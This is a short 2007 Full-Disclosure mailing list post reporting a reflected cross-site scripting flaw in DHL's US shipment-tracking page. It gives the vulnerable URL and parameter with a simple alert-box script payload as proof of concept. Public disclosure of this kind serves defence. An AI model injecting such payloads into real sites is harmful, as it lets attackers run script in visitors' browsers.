[Full-disclosure] XSS @ DHL
Static Rez
staticrez at gmail.com
Mon Dec 24 21:48:17 GMT 2007
I know these XSS vulns are kind of easy to find and they usually come off as
"so easy a monkey could do it", but i thought i'd throw this one out
there...
http://track.dhl-usa.com//atrknav.asp?shipmentNumber=
<script>alert('test')</script>
sincerely,
a monkey.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071224/655a1674/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.